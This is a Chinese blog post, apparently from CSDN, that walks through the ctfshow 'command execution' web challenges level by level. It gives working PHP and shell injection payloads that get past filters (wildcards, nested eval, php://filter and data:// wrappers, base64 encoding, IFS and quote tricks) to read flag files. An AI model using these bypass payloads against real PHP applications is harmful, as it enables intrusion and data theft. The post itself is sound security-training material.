WEB ---- ctfshow ----命令执行

已于 2022-07-29 18:10:19 修改
阅读量370 收藏 2
点赞数
分类专栏: web 0-1 文章标签: php 开发语言
于 2022-07-28 10:08:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ckk1314520/article/details/126017425
版权
本文详细介绍了多个PHP环境下的命令注入和文件包含漏洞利用方法,包括通配符技巧、编码绕过、函数替代等,展示了如何通过系统调用执行命令以及包含文件来读取敏感信息。同时,也演示了不同场景下的过滤和绕过策略,如使用cat、tac、nl等命令的替代,以及分号和空格的替代方法。
摘要由CSDN通过智能技术生成

web29

在这里插入图片描述
flag进行了过滤

可以采用通配符来代替

通配符*?的区别是*可以用来代替零个、单个或多个字符,而?仅可以使用代替一个字符。*表示匹配的数量不受限制,而?的匹配字符数则受到限制。

c=system('ls');

c=system('cat fla?.php');

或者是
将flag.php复制到1.txt文件内

c=system('cp fla?.php 1.txt');

然后访问ctf.show/1.txt

web30

在这里插入图片描述
phpsystem进行了过滤

同上一题一样

web31

在这里插入图片描述
对空格,.,还有cat进行了过滤。

采用 嵌套eval执行

先试一试c=eval($_GET[pw]);&pw=phpinfo();,测试成功

c=eval($_GET[pw]);&pw=system('ls');

c=eval($_GET[pw]);&pw=system('cat flag.php');

然后查看源码

web32

在这里插入图片描述这次连;分号都过滤了

在最末尾,?>可以代替;分号

c=include%0a$_GET[pw]?>&pw=php://filter/convert.base64-encode/resource=flag.php
include 进行包含,%0a是换行,php://filter/convert.base64-encode/resource是文件包含的插件
得到的是Base64编码文件,然后进行Base64解码

web33

在这里插入图片描述
和web32类似

c=include%0a$_GET[pw]?>&pw=php://filter/convert.base64-encode/resource=flag.php

也可以

c=require%0a$_GET[pw]?>&pw=php://filter/convert.base64-encode/resource=flag.php

web34

在这里插入图片描述同理

c=include%0a$_GET[pw]?>&pw=php://filter/convert.base64-encode/resource=flag.php

web35

在这里插入图片描述
同理

c=include%0a$_GET[pw]?>&pw=php://filter/convert.base64-encode/resource=flag.php

web36

在这里插入图片描述
同理

c=include%0a$_GET[pw]?>&pw=php://filter/convert.base64-encode/resource=flag.php

web37

在这里插入图片描述
c=data://text/plain,<?php system('cat fla?.php');?>

flag用通配符表示

data:将后面的内容当作代码

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

而这个是将<?php system('cat flag.php')?>进行Base64编码

web38

在这里插入图片描述
这次过滤了flagphpfile

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

<?php system('cat flag.php')?>进行了Base64编码

web39

在这里插入图片描述
这次没有了回显。

c=data://text/plain,<?php system("cat fla?.ph?");?>

c=data://text/plain,<?= system("cat fla?.ph?");?>

c=data://text/plain,<?= system("tac fla?.ph?");?>

web40

在这里插入图片描述show_source(next(array_reverse(scandir(pos(localeconv())))));

show_source()函数和highlight_file()函数一样, — 语法高亮一个文件。

scandir函数 — 列出指定路径中的文件和目录
成功则返回包含有文件名的array,如果失败则返回false。如果directory不是个目录,则返回布尔值false并生成一条E_WARNING级的错误

web41

在这里插入图片描述
使用宇师傅大佬的脚本

https://blog.csdn.net/miuzzx/article/details/108569080

web42

在这里插入图片描述

c=cat flag.php%0a;

或者是

c=cat flag.php;ls通过双写进行绕过,分号进行分割,分号后面作为参数输入到/dev/null
分号前面被执行。

web43

在这里插入图片描述

cat进行了过滤,可以使用tac或者nl来代替cat

c=tac flag.php%0a

web44

在这里插入图片描述

flag被过滤了,用通配符代替

c=tac fla?.php%0a

web45

在这里插入图片描述

过滤了,;分号还有空格,对于分号可以使用&&来代替,且经过URL编码,为%26%26
c=tac%09fla?.php%26%26ls
或者是
c=tac%09fla?.php%0a

web46

在这里插入图片描述

过滤了*通配符,$符号
使用
c=tac%09fla?.php%0a
或者
c=tac%09fla?.php%26%26ls

web47

在这里插入图片描述并没有对tac进行过滤
使用
c=tac%09fla?.php%0a
或者
c=tac%09fla?.php%26%26ls

web48

在这里插入图片描述
和web47一样

web49

在这里插入图片描述
同上

web50

在这里插入图片描述
过滤了%09%26
c=tac<fla''g.php||ls
或者
c=nl<fla''g.php||ls
||或逻辑运算符也可以进行URL编码为%7c%7c

web51

在这里插入图片描述这次过滤了tac
所以使用c=nl<fla''g.php%7c%7cls

web52

在这里插入图片描述
c=nl$IFS/fla''g%7c%7cls

web53

在这里插入图片描述
$d = system($c);是将%c作为命令执行。

使用

c=c''at${IFS}fla''g.p''hp

web54

在这里插入图片描述
可以使用mv重命名
c=mv${IFS}fla?.php${IFS}z.txt
还有提示
/bin/?at${IFS}f???????
其他符号用通配符?代替

web55

web56

web57

web 58

在这里插入图片描述
c=show_source('flag.php');

web59

在这里插入图片描述

c=show_source('flag.php');

web60~web65

都是一样的

@See you later
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web-socket-js
12-19
web-socket-js亲测可用
32位tomcat-7.0.55 工具下载
08-25
Tomcat是Apache 软件基金会(Apache Software ...因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。目前最新版本是8.0。
ctfshow 命令执行
m0_74097148的博客
05-21 3599
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
CTFShow 命令执行
paidx0
06-11 1082
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 题目过滤了flag,相当于什么也没过滤,姿势就有很多了 payload1:c=system("nl fla?????"); payload2:c=system("
ctf_show笔记篇(web入门---命令执行
最新发布
whale_waves的博客
03-02 1630
${PWD::${##}}???${PWD::${##}}?${USER:~A}?$IFS????.??? ####我的环境$USER是root,ctfshow的不是所以这里是正常的
ctfshow web入门 命令执行部分(29-31)
羽的博客
09-05 2219
大佬请自行忽略讲解部分,讲解针对新手。知识点源自payload的构造。大部分flag需要右键查看源码获得 29 知识点:通配符 payload:c=system('cat f*'); 在linux系统 有一些通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file * ? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0 [abcd] 匹配abcd任何一个字符 [a-z] 表示范围a到z,表示范围的意思 []匹配括号任意一个字符 ls fil
CTFshow 反序列化 web268
Kradress的博客
02-11 496
目录思路题解总结 思路 发现这题和上题一样的,用之前的链子发现什么回显也没有,可能这个链子用不了了,就直接拿群里的吧 题解 exp <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-05-03 21:55:29 # @Last Modified by: h1xa # @Last Modified time: 2021-05-04 01:25:28 # @email: h1xa@ctfer.com # @link:
azkaban-web-server
03-04
- **编写工作流**:Azkaban工作流通过JSON格式的`.job`文件定义,包含任务的依赖关系、命令执行逻辑等。 - **上传与提交**:在Web界面上传`.job`文件,设置参数并提交工作流。 - **监控与调试**:提交后,用户...
au3-web-api_web-api_
09-30
标题的"au3-web-api_web-api_"表明这是一个与AutoIt3相关的项目,它实现了Web API接口,使得AutoIt3脚本能够与Web服务进行交互。这允许用户通过网络调用在远程服务器上执行AutoIt3脚本,或者获取远程服务提供的...
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
[WP/WEB/反序列化/未完]CTFshow-web257-268
車鈊的博客
10-12 972
Web257 <?php class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function
CTFshow 命令执行 web57
Kradress的博客
11-20 432
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-08 01:02:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 还能炫的动吗? //flag in 36.php if
ctfshow-web入门57
m0_73303597的博客
01-01 540
自用
ctfshow web入门 web57
Firebasky的博客
09-13 2002
这道题是之后群主直接放了payload 其实比较困难,下面就是自己的分析 源代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-08 01:02:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // .
ctfshow web入门 命令执行:55-57
rawrecruit的博客
04-04 4752
ctfshow web入门 命令执行篇的个人刷题记录。
CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 2792
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
CTF命令执行绕过
蚁景网安学院
04-21 3249
作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础
CTF php反序化简单的入门题目 (对初学者非常友好,单一考点)
AAAAAAAAAAAA66的博客
12-28 2224
地址 :要注册的 http://www.whalwl.site:8026/ 题目非常明了,只有一个类site 和一个魔法函数_destruct unserialize(反序化前自动调用_destruct) 关键 在$a($this->title) 明显的是a参数执行(this->title) 所以在这里可以构造命令执行,利用assert函数执行system系统命令。 构造payload <?php class site{ public $url...
buuctf小白入门的题解
weixin_60813400的博客
10-01 1110
ctf小白入门题解
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面,我们注意到了一个提交订单的功能,并且发现了其一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目的具体情况来确定。在CTF比赛,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值